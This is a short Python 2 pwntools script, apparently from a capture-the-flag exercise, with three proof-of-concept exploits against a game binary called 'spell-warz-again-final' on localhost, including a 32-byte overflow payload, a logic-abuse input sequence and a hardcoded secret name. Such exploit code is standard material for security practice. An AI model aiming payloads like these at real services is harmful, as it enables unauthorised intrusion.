You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
71 lines
1.5 KiB
71 lines
1.5 KiB
from pwn import process, remote
|
|
|
|
FILENAME = "./spell-warz-again-final"
|
|
|
|
def run():
|
|
# return process(FILENAME)
|
|
return remote("127.0.0.1", 60204)
|
|
|
|
def poc0():
|
|
p = run()
|
|
print p.recvuntil(">")
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
print p.recvuntil(">")
|
|
p.sendline("2")
|
|
print p.recvuntil(">")
|
|
p.sendline("4")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
for _ in xrange(10):
|
|
print p.recvuntil(">")
|
|
p.sendline("100")
|
|
p.interactive()
|
|
|
|
|
|
def poc1():
|
|
p = run()
|
|
print p.recvuntil(">")
|
|
p.sendline("Leo")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
for _ in range(2):
|
|
print p.recvuntil(">")
|
|
p.sendline("3")
|
|
print p.recvuntil(">")
|
|
p.sendline("0")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
print p.recvuntil(">")
|
|
p.sendline("1")
|
|
print p.recvuntil(">")
|
|
p.sendline("4")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
for _ in range(10):
|
|
print p.recvuntil(">")
|
|
p.sendline("99")
|
|
p.interactive()
|
|
|
|
|
|
def poc2():
|
|
p = run()
|
|
print p.recvuntil(">")
|
|
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
print p.recvuntil(">")
|
|
p.sendline("2")
|
|
print p.recvuntil(">")
|
|
p.sendline("4")
|
|
print p.recvuntil(">")
|
|
p.sendline("y")
|
|
for _ in xrange(10):
|
|
print p.recvuntil(">")
|
|
p.sendline("100")
|
|
p.interactive()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
poc1()
|